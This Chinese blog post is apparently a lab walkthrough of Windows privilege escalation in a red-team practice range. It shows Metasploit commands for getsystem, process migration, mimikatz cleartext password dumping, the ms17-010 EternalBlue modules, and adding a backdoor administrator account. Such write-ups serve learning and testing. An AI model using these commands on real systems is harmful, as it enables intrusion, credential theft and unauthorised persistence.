靶机练习 - ATT&CK红队实战靶场 - 3. Windows提权
mimikatz提权
首先对已经getshell的Win7主机进行提权。
用msf自带的getsystem提权,直接执行命令:getsystem
网上查到可以用mimikatz抓取明文密码。
MSF中自带mimikatz模块,同时支持32位和64位,默认加载32位,64位须先查看系统进程列表,然后将meterpreter进程迁移到一个64位程序的进程中,才能加载mimikatz并且查看系统明文。
首先查看系统信息,是64位win7系统:
执行命令ps,找一个64位的进程,比如516:
迁移进程:migrate 516,加载mimikatz:load mimikatz
执行这个命令:mimikatz_command -f sekurlsa::searchPasswords。抓到明文密码>_<。。hmmm...有种背后一凉的感觉。。这明显是个强密码啊。。所以为啥能直接把密码抓出来>_<,得抽空去看下mimikatz的工作原理
还有一位大大介绍用这个命令跑:mimikatz_command -f samdump::hashes,没有跑出来,可能是不同模式的原因,拿个小本本先记下来,后续专门看下。。。
上一篇内网信息收集的时候已经找到同域的另外两台主机了,对于我这种菜鸟,不扫描一下是不行的,那么现在的问题就是怎么对另外两台主机进行扫描。。
其实Win7这台机器上已经安装了nmap,如果没有装,是不是可以自己丢一个上去。。。但会不会太明显了>_<
永恒之蓝
先扫 一下192.168.52.141(GOD域上的主机名为ROOT-TVI862UBEH),找到一处漏洞ms17-010,搜了一下ms17-010就是永恒之蓝。
使用msf现成的模块:use exploit/windows/smb/ms17_010_eternalblue,并设置好参数,木有成功>_<
换一个:use auxiliary/admin/smb/ms17_010_command
看下用户权限:set command whoami,拿到system权限(^-^)V
添加用户:set command net user tests qwer@1234 /add (注意密码规则,弱密码无法创建成功)
给新用户管理员权限:set command net localgroup administrators tests /add
看下用户是否添加成功:set command net user tests
这步之后要做的是打开远程桌面-》配置socks4a代理-》proxychains rdesktop 登录,试了下我用proxychains没法远程连接>_<!! 原因不明(小本本先记下来) 。
最后看到还有一个模块:windows/smb/ms17_010_psexec
尝试了一下,在运行过程中2003那台机器直接蓝屏重启了2333....
永恒之蓝这个漏洞我磕了好几天都木有搞定,ε=(´ο`*)))唉,暂时放弃了。。。接下来的一些利用方法我暂时理解不了,先到此为止了。
本文仅用于技术学习和交流,严禁用于非法用途,否则产生的一切后果自行承担。
如需转载,请注明出处,这是对他人劳动成果的尊重。